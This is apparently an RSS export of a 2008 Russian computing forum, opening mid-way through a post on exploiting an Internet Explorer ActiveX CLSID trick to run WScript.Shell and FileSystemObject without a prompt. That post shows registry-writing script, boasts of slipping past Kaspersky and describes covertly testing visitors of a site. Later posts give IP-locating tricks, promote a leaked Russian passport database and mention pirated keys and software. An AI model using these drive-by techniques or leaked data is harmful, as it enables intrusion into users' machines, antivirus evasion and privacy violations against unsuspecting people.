						&lt;p&gt;&amp;lt;script&amp;gt;&lt;br /&gt;setTimeout(&amp;quot;modify()&amp;quot;,1000);//запускаем модификацию CLSID спустя 1 сек, после загрузки страницы&lt;/p&gt;
						&lt;p&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;После модификации CLSID объекта мы получаем новый объект с нужным нам CLSID и браузер при этом не запрашивает подтверждения на запуск у пользователя! Что и требовалось доказать :). &lt;br /&gt;Демонстрацию данной уязвимости смотрите здесь . &lt;/p&gt;
						&lt;p&gt;Как уже отмечалось, данная дыра в защите браузера присуща не всем типам ОС, и зависит от настроек браузера и переменных окружения. Статистика распространенности данной уязвимости описана в следующей главе. &lt;br /&gt;Оценка численности уязвимых компьютеров в Internet&lt;br /&gt;Для определения численности уязвимых хостов, было проведено статистическое исследование. В исследовании была проанализирована уязвимость компьютеров пользователей сайта &lt;a href=&quot;http://antichat.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://antichat.ru&lt;/a&gt;. &lt;/p&gt;
						&lt;p&gt;Технология тестирования была следующей: на главной странице сайта был внедрен скрипт, который пытался несанкционированно запустить на машине пользователя ActiveX компоненты WScript.Network и Scripting.FileSystemObject методом модификации CLSID. Результат попытки автоматически отправлялся на сниффер сайта. Он же фиксировал тип операционной системы пользователя и версию браузера. &lt;/p&gt;
						&lt;p&gt;В связи с тем, что аудитория сайта специфична, то при рассмотрении результатов исследования нужно делать скидку на то, что посетители antichat.ru являются более &amp;quot;продвинутой&amp;quot; аудиторией, чем средний пользователь Internet. &lt;/p&gt;
						&lt;p&gt;Идентификация пользователей проводилась на основании их IP адреса. Было проанализировано 100 различных хостов. Сбор даных происходил в течении суток (26 октября 2002 года). &lt;/p&gt;
						&lt;p&gt;Общий результат исследования приведен в таблице: &lt;br /&gt;Уязвимость хостовКомпьютер уязвим	46%&lt;br /&gt;В том числе с неустойчивой уязвимостью*	3%&lt;br /&gt;Компьютер не уязвим	54%&lt;br /&gt;База: 100 хостов&lt;/p&gt;
						&lt;p&gt;* - под неустойчивой уязвимостью понимается то, что часть тестов хоста были успешными, а часть - нет. &lt;/p&gt;
						&lt;p&gt;Далее приведены данные уязвимости хостов в зависимости от типа операционной системы и типа браузера. &lt;br /&gt;Уязвимость хостов в зависимости от типа ОС и браузераOC	Браузер	Процент уязвимых хостов	База&lt;br /&gt;Windows 98	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;MSIE (все версии)	82%	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;45&lt;br /&gt;Windows 98	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; MSIE 5.0;5.01;5.5	74%	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 31&lt;br /&gt;Windows 98	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; MSIE 6.0	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 93%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;	14&lt;br /&gt;Windows ME (Win9x 4.90)	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;MSIE (все версии)	29%	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;14&lt;br /&gt;Windows NT4.0,NT5.0	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; MSIE (все версии)	44%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;	10&lt;br /&gt;Windows XP (NT5.1)	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;MSIE (все версии)	0%	&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;30&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Как видно из таблиц, около половины всех пользователей интернет имеют уязвимость несанкционированного запуска опасных объектов. Наиболее опасна операционная система Windows 98, среди пользователей которой подвержены уязвимости более 80% хостов. Полное отсутствие уязвимости наблюдается только у операционных систем линейки NT, начиная с версии NT 5.1 (Windows XP). &lt;br /&gt;Доступ к информации на удаленном компьютере&lt;br /&gt;В этой главе рассмотрим конкретные методы воздействия на машину пользователя и несанкционированного скачивания информации с нее. &lt;br /&gt;В примерах предыдущих глав уже подробно описывались возможности объекта WScript.Network. Однако, существуют и намного более опасные ActiveX объекты. Ниже описаны возможности таких ActiveX объектов как Scripting.FileSystemObject и WScript.Shell.1. &lt;br /&gt;Объект WScript.Shell.1 (CLSID=F935DC26-1CF0-11D0-ADB9-00C04FD58A0B)&lt;br /&gt;Этот объект позволяет получить доступ к переменным окружения операционной системы, узнать системные папки, запустить программы на машине пользователя, изменить параметры ОС, читать и модифицировать системный реестр. Продемонстрируем лишь одну возможность: модификацию реестра. &lt;br /&gt;Запись в реестр производится методом RegWrite объекта. В примере производится установка стартовой страницы браузера: &lt;/p&gt;
						&lt;p&gt;&amp;lt;APPLET ID=&amp;quot;Shl&amp;quot; &lt;br /&gt; CLASSID=&amp;quot;CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B&amp;quot;&amp;gt; &lt;br /&gt;&amp;lt;/APPLET&amp;gt; &lt;br /&gt;&amp;lt;script&amp;gt; &lt;br /&gt;Shl.RegWrite (&amp;quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page&amp;quot;, &amp;quot;http://antichat.ru&amp;quot;); &lt;br /&gt;&amp;lt;/script&amp;gt; &lt;/p&gt;
						&lt;p&gt;Здесь приведен пример несанкционированного исполнения данного кода&amp;#160; (внимание! при открытии ссылки ваша стартовая страница браузера будет изменена!). &lt;/p&gt;
						&lt;p&gt;Примечательно то, что антивирус Касперского (AVP) последних версий распознает в этом скрипте вирус, однако небольшая модификация исходного текста и скрипт проходит сквозь касперского без проблем&amp;#160; :-). &lt;/p&gt;
						&lt;p&gt;Конечно, изменение стартовой страницы браузера - не столь уж важная вещь, но как вы понимаете, реестр хранит всю жизненно важную информацию операционной системы, начиная от паролей пользователей и заканчивая установками автоматически загружаемых драйверов и программ. &lt;/p&gt;
						&lt;p&gt;Несанкционированное срабатывание данного объекта может привести к порче ОС в лучшем случае, и к полному уничтожению информации на ваших дисках - в худшем. При наличии доступа к этому объекту, последнее - лишь дело техники. Сайт, содержащий подобный код, превращается в сайт-убийцу в прямом смысле слова, так как одного только посещения его, уже достаточно для полной потери информации на вашем компьютере. &lt;br /&gt;Объект Scripting.FileSystemObject (CLSID=0D43FE01-F093-11CF-8940-00A0C9054228)&lt;br /&gt;Данный объект предназначен для файловых операций: создание, чтение, запись, переименование, удаления файлов и папок. В отличие от объекта WScript.Shell, данный объект может не только удалить файлы или каталоги, но и прочитать их. А прочтя, отправить их содержимое в сеть. &lt;br /&gt;Продемонстрируем три примера: &lt;br /&gt;Создание файла на машине пользователя . &lt;br /&gt;Считывание существующих папок на машине пользователя . &lt;br /&gt;Поиск и считывание ini файла с машины пользователя . &lt;/p&gt;
						&lt;p&gt;В последнем примере скрипт точно определяет имя системной папки, содержащей ini файлы и читает один из них. Прочитанное содержимое файла может быть без труда отправлено на другой сервер без ведома пользователя. &lt;/p&gt;
						&lt;p&gt;Таким образом, с машины ничего не подозревающего любителя посидеть в инете, могут &amp;quot;утекать&amp;quot; файлы содержащие важную информацию, начиная от рабочих DOC файлов, и заканчивая ini файлами, содержащими пароли. &lt;/p&gt;
						&lt;p&gt;Более того, не составляет труда разработать целую систему, которая будет интерактивно работать с хакером, и которая будет позволять ему работать с вашим диском как со своим собственым. &lt;/p&gt;
						&lt;p&gt;Поразительно то, что около половины хостов при этом даже не будут подозревать об утечке информации, так как их браузер даже не предупредит о несанкционированном запуске опасных объектов.&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 13 Jun 2008 22:25:36 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=18#p18</guid>
		</item>
		<item>
			<title>Узнаем IP</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;по ICQ &lt;/p&gt;
						&lt;p&gt;1. Существуют патчи, позволяющие показывать IP-адрес. Патч для icq 2001b (&lt;a href=&quot;http://www.demention3d.narod.ru/soft/icq_patch.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.demention3d.narod.ru/soft/icq_patch.rar&lt;/a&gt; ) build 3659, Патч для ICQ 2002a Beta Build #3722&amp;#160; ( &lt;a href=&quot;http://debugger.by.ru/razno/icq2002a_ip.zip&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://debugger.by.ru/razno/icq2002a_ip.zip&lt;/a&gt;) для показа IP Добавляет в аське в окне свойств юзера окошко в котором показывается IP. (Сделал DeBugger(&lt;a href=&quot;http://debugger.by.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://debugger.by.ru/&lt;/a&gt;) )&lt;/p&gt;
						&lt;p&gt;2. IP можно узнать посмотрев все соединения, при помощи netstat.exe описание на примере Odigo смотри тут &lt;/p&gt;
						&lt;p&gt;3. На сайте &lt;a href=&quot;http://www.leader.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.leader.ru&lt;/a&gt; есть такая фишка: UIN Locator, вводиш номер и получаешь IP, надо только чтобы чел был в онлайне. &lt;br /&gt;Узнаем IP через IRC &lt;br /&gt;/dns nick - узнать IP машины пользователя по нику &amp;quot;nick&amp;quot;;&lt;br /&gt;/ctcp nick clientinfo - узнать информацию о IRC-клиенте &amp;quot;ника&amp;quot;;&lt;br /&gt;/ctcp nick time -узнать время которое установлено на его машине; &lt;/p&gt;
						&lt;p&gt;Так же можно использовать Способы как в html-чате )&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 13 Jun 2008 22:20:26 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>все зайдите</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=15#p15</link>
			<description>&lt;p&gt;Виж у что сюда за ссылками постоянно лезут люди, так положите сюда спасибо чоли... а то помогаю а так... паршива что не знаешь кому)&lt;br /&gt;а лучше регайтесь и поддержите форум&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 13 Jun 2008 22:06:44 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=15#p15</guid>
		</item>
		<item>
			<title>опрос</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=14#p14</link>
			<description>&lt;p&gt;я лично пользуюсь каспером 6, не нагружает иситему правда нынче трудновато искать свежие ключи&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Thu, 05 Jun 2008 21:32:57 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=14#p14</guid>
		</item>
		<item>
			<title>Сайты скачивания разных программ</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://soft.softodrom.ru/scr/rasdel.php?ras=8&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://soft.softodrom.ru/scr/rasdel.php?ras=8&lt;/a&gt; вот чем полльзуюсь с завид ным постоняством, всего и понемногу&lt;br /&gt;&lt;a href=&quot;http://cjcity.ru/soft/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cjcity.ru/soft/&lt;/a&gt; сайт с различными программами для создания музыки&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Thu, 05 Jun 2008 11:34:54 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>Юмор до блювотины</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;фото и видео которые оставляют тебя в акуе или желании блевануть&lt;br /&gt;&lt;a href=&quot;http://spynet.ru/video/12556-pjanyjj-popal-pod-poezd.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://spynet.ru/video/12556-pjanyjj-po &amp;#8230; poezd.html&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://spynet.ru/shoked/11845-krasota-jeto.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://spynet.ru/shoked/11845-krasota-jeto.html&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://spynet.ru/shoked/12292-devchonki-fotkajut-sami-sebja-39-foto-18.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://spynet.ru/shoked/12292-devchonki &amp;#8230; to-18.html&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Thu, 05 Jun 2008 11:28:52 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>Сайтики</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;сюда ссылки с интерент приколами и наепками)))&lt;br /&gt;&lt;a href=&quot;http://spynet.ru/pasport/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://spynet.ru/pasport/&lt;/a&gt; - выложена новая база паспортов россии, тама каждый есть))&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Thu, 05 Jun 2008 11:06:33 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>морево видео</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;Сюда выкладываем офигенно морные видиои в названии поста подписываем примерную направленность&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://video.online.ua/8/10720.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://video.online.ua/8/10720.php&lt;/a&gt;&amp;#160; исполнение танца живот двухгодовалым ребенком=)&lt;br /&gt;&lt;a href=&quot;http://video.online.ua/8/10704.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://video.online.ua/8/10704.php&lt;/a&gt; мента обосрали бо жти коровки!!!)) ваще реальный замор)))) &lt;br /&gt;&lt;a href=&quot;http://video.online.ua/8/10665.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://video.online.ua/8/10665.php&lt;/a&gt;&amp;#160; американский световой флеш моб&lt;br /&gt;&lt;a href=&quot;http://video.online.ua/8/10677.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://video.online.ua/8/10677.php&lt;/a&gt; офигенное видео про силачей, советую Всем +5 от меня)))&lt;br /&gt;чуть позже дам еще)))&lt;br /&gt;&lt;a href=&quot;http://spynet.ru/video/12556-pjanyjj-popal-pod-poezd.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://spynet.ru/video/12556-pjanyjj-po &amp;#8230; poezd.html&lt;/a&gt; акуенно, пейте алкоголь больше&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Wed, 04 Jun 2008 21:25:18 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>Альтернатива и армяне... Совместимы ли?</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=9#p9</link>
			<description>&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;&amp;#91;220v написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;]кульная группа, когда играю в кс или другую экш игру всегда включаю что-то именно в этом духе))&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;Палюбому... Под это кул играть)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (MustanG)</author>
			<pubDate>Sat, 31 May 2008 21:28:58 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>World of Warcraft: The Burning Crusade</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;Вот сопсна.. Разговариваем, делимся интересными штучками и т.д. А также классы, и их прокачка по талантам..&lt;/p&gt;</description>
			<author>mybb@mybb.ru (MustanG)</author>
			<pubDate>Sat, 31 May 2008 20:42:56 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Ваш wow класс и пишите какого вы считает  лучшим?</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;юзаем опрос&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 30 May 2008 22:13:31 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>GTA 4</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;Высказываем свои мнения и пишем рецензии те кто играл в эту игру&lt;br /&gt;Или скажите то чего вы ждете от этой игры и потянет ли ваша машиа эту чуду игру?вот в качестве несколько обоев&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 30 May 2008 22:09:20 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>Игровые сервера</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;Сервера на которых я играю постоянно:&lt;br /&gt;wow.irkgame.ru&lt;/p&gt;
						&lt;p&gt;и вообще все сервера смотрим на &lt;a href=&quot;http://www.mmotop.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.mmotop.ru/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Аддоны для wow &lt;a href=&quot;http://wowui.worldofwar.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://wowui.worldofwar.net/&lt;/a&gt; и &lt;a href=&quot;http://wow.curse.com/downloads/addons/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://wow.curse.com/downloads/addons/&lt;/a&gt;&lt;br /&gt;(Статью по аддонам можно найти на&amp;#160; &lt;a href=&quot;http://wow.bnet.by/index.php?action=printpage;topic=110.0&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://wow.bnet.by/index.php?action=pri &amp;#8230; opic=110.0&lt;/a&gt; )&lt;br /&gt;Клиент Wow лучше качать здесь &lt;a href=&quot;http://wow.irkgame.ru/index.php?option=files&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://wow.irkgame.ru/index.php?option=files&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Сs 1.6 &lt;a href=&quot;http://cs.gamering.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cs.gamering.ru&lt;/a&gt; &lt;br /&gt;моды для кс&lt;br /&gt;дезматч&amp;#160; &lt;a href=&quot;http://www.c-s.ru/mods/csdm.zip&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.c-s.ru/mods/csdm.zip&lt;/a&gt;&lt;br /&gt;суперхероу &lt;a href=&quot;http://thepiratebay.org/tor/3421877/Superhero_MOD_CS&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://thepiratebay.org/tor/3421877/Superhero_MOD_CS&lt;/a&gt;&lt;br /&gt;позже выложу еще несколько&lt;br /&gt;подскажите какие еще сервера хорошие есть...&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 30 May 2008 21:59:34 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>Юзай gaming</title>
			<link>http://ruscomp.forumbb.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;ИГровая индустрия занимает всё большее место в экономической системе стран, и не менее&amp;#160; быстро заполоняет умы и разумы людей, определим ту игру, которая заполоняет наиболее всехватывающе=&lt;/p&gt;</description>
			<author>mybb@mybb.ru ([220v])</author>
			<pubDate>Fri, 30 May 2008 14:47:30 +0400</pubDate>
			<guid>http://ruscomp.forumbb.ru/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
